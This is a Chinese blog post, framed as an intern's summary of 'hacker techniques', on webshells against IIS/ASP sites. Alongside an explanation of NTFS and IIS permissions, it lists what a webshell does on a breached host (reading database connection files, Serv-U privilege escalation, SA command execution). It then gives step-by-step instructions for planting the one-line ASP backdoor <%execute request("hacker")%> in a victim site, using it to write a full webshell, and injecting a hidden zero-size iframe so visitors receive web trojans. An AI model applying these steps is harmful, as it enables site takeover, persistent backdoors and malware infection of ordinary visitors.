`
fuerbosi
  • 浏览: 465881 次
文章分类
社区版块
存档分类
最新评论

实习总结(九)---黑客技术小盘点+

 
阅读更多

有了第一次的尝试,极大地促进了我的兴趣,不是原来没有接触过,只是限于时间的原因,现在稍有闲暇就出来献一献丑,但是还是的再一次提醒和我一样只是玩一玩的同志们,不要触及黑客领域的红线,你们知道的......

好了,今天有总结如下:

一、制作网页木马:

所谓网络木马,就是常说的WEBSEHLL,即能在WEB上对网站进行操作的权限,他主要包括似下几方面的功能:

1)查看用户权限。一般虚拟主机的每个用户都是独立配置的用户,属于GUEST组,同时仅对自己的目录有完全可控制权限,Administrator为管理员,SUPPORT_388945a0为3389用户登陆帐号

2)查看运行服务。重点观察有没有SERV_U可以用来本地溢出提权或者添加FTP帐号,还有PCANYWHERE,如果目录可以访问。可以找到保存密码的CIF文件.TreminalServices是3389服务的,还有防火墙或杀毒软件的进程的RavTask是瑞星。Norton是诺顿等等。

3)上传下载文件。上传和下载的文件最好不要太大,超过一M的文件下载时有可能程序会死机,上传木马时注意文件名隐蔽,下载ASP文件如果太大,应该COPY成其它可以在IE中下载的护展名或者改名之后再下载,速度快而且不会死机。

4)编辑文件。保存的时侯注意权限,另外主要用来看文件的代码,最关键的是CONN.ASP--数据库链接文件。

5)查看目录。可以输入二级目录实现跳转.比如C:\本是无权访问的,但是直接输入C:\WINNT则可以访问到。

6)使用CMD执行命令(要权限)。虚拟主机一般是没有权限使用CMD的,获者只有GUEST权限,可以列出进程,或者用户等等

7)文件关键字搜索。可以用于查到关键文件。

8)连接并操作数据库。对数据库进行的操作,如果是MSSQL,且为SA权限可以常试用SA执行命令,如果数据库和WEBSEHLL是分离的可以尝连接另一台提供数据库。

二、了解Webshell

硬盘权限的设置,必须是硬盘为NTFS格式的再有这个功能,WINDOWS2000和WINDOWS2003中默认就是NTFS的分区式,WINDOWSXP中默认的是FAT32格式分区,此分区格式是无法进行硬盘权限管理的。

1)权限的分类

硬盘的权限,可以分为读、写、修改、运行、完全控制。

在IIS的WEB目录下,还有脚本执行和列目录,两种特殊的权限,下面先介绍一下这几种权限代表的含义:

(1)读取:即可以看到文件的内容,如果该目录下有TXT,INI,脚本类的文件,能看到文件的内容;

(2)修改:对文件有编辑的权限,如编辑TXT.INI,脚本文件可以修改其内容,并且可以修改文件名,但不能创建新的文件;

(3)写入:除拥有修改的权限外,还能创建一个新的文件,假设一个目录只有修改权限没有写入权限,那么我们是无法在这个目录上传工具和生成木马的写入权限>修改权限;

(4)运行:拥有此权限下的可执行文件.EXE才能被执行,如果无此权限,则不会被执行,当我们运行本地提权程序,如SERV_U前提条件就是放置提权工具的目录要求有运行权限;

(5)完全控制:故名思义,无所不能,完全具有以上几种权限。

2)权限的特性

权限是具有继承性、累加性、优先性、交叉性的。

(1)继承性是说下级的目录在没有经过重新设置之前,是拥有上一级目录权限设置的。这里还有一种情况要说明一下,在分区内复制目录或文件的时候,复制过去的目录和文件将拥有它现在所处位置的上一级目录权限设置。但在分区内移动目录或文件的时候,移动过去的目录和文件将拥有它原先的权限设置。

(2)累加是说如一个组GROUP1中有两个用户USER1、USER2,他们同时对某文件或目录的访问权限分别为“读取”和“写入”,那么组GROUP1对该文件或目录的访问权限就为USER1和USER2的访问权限之和,实际上是取其最大的那个,即“读取”+“写入”=“写入”。又如一个用户USER1同属于组GROUP1和GROUP2,而GROUP1对某一文件或目录的访问权限为“只读”型的,而GROUP2对这一文件或文件夹的访问权限为“完全控制”型的,则用户USER1对该文件或文件夹的访问权限为两个组权限累加所得,即:“只读”+“完全控制”=“完全控制”。

(3)优先性,权限的这一特性又包含两种子特性,其一是文件的访问权限优先目录的权限,也就是说文件权限可以越过目录的权限,不顾上一级文件夹的设置。另一特性就是“拒绝”权限优先其它权限,也就是说“拒绝”权限可以越过其它所有其它权限,一旦选择了“拒绝”权限,则其它权限也就不能取任何作用,相当于没有设置。

(4)交叉性是指当同一文件夹在为某一用户设置了共享权限的同时又为用户设置了该文件夹的访问权限,且所设权限不一致时,它的取舍原则是取两个权限的交集,也即最严格、最小的那种权限。如目录A为用户USER1设置的共享权限为“只读”,同时目录A为用户USER1设置的访问权限为“完全控制”,那用户USER1的最终访问权限为“只读”。

IIS的WEB目录下还有两种特殊的权限设置,就是脚本执行权限和列目录权限。

我们知道网站的构成基本上都离不开脚本,而脚本是在服务器上被执行后生成给客户浏览器访问的,如果没有脚本执行权限,网站的APS,PHP等脚本不会被执行也就无法被访问到网站的内容.有时上传到网站的木马,访问时发现显示的是源代码产没被执行,这就是该目录限制了脚本执行权限的原因。

列目录权限通常不能给予,如果给于WEB目录列目录权限,那么网站的目录以及文件,就会就在浏览器中被显示出来,这是极其危险的,这会让攻击者得到网站的源文件并且分析出漏洞,还能下载数据库得到管理员密码,风险不言而誉。

三、对Webshell的使用

1)在网站文件中插入后门:

插入后门,其本质就是将一段能接收远程地址发送信息的代码(俗称一句话木马)插入到网站脚本程序里,这个脚本程序是网站本身的程序,被插入一句话木马后,当远程提求该文件并提交的信息时,那段接收代码会接收并处理接收到的信息,如果提交的内容是的指令其生成一个脚本木马,同样也会被执行,这就是插入木马的原理。

后门相比WBESEHLL,,很隐蔽,也不生成新的文件,不易被查觉,因为在获得网站权限后插入后门几乎是必做的功课,一句话木马并不神密,这就是一段最常用的一句话木马代码---<%executerequest("hacker")%>---把这段代码,放在目标网站原有脚本文件的首尾.这个文件即被安插了后门。

安插好木马后,使用远程提交表单,向被插入后门的文件提交脚本木马:

(1)打开表单,将第一行<formaction=后面的链接地址改成你插入木马文件的地址,比如http://www.XXXX.com/int.asp

(2)<textareaname=caicaicols=120NAME参数改成<%executerequest("hacker")%>request后的参数一样,如一句话木马中是hacker这里一样改为hacker。

(3)lP.SaveToFileserver.mappath("test1.asp")

response.redirect"test1.asp"

这两处的TEST1.ASP为生成后的脚本木马的文件名,进行相应的修改。

以上几处修改后保存为HTM后缀,打开后在填入木马内容的地方粘贴入要上传的脚本木马的内容,提交即可连接上生成的脚本木马。这样当以后脚本木马被删除时,后门文件如果存在,即可再次获得WBESEHLL。

2)在网站挂木马,网页木马的配置和生成,在其它教程中已经有详细的介绍,这里不重复演示,挂木马其实很简单,几乎90%的木马,都是通过<iframesrc=http://www.sohu.com/index.aspwidth=0height=0></iframe>。其中SRC后面的就是你生成的网页木马的链接,将这个代码,插入网站文件即可(一般为INDEX.ASP.INDEX.HTM等被调用最多的文件),这样当别人上该网站访问到这个文件时就会中到木马。

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics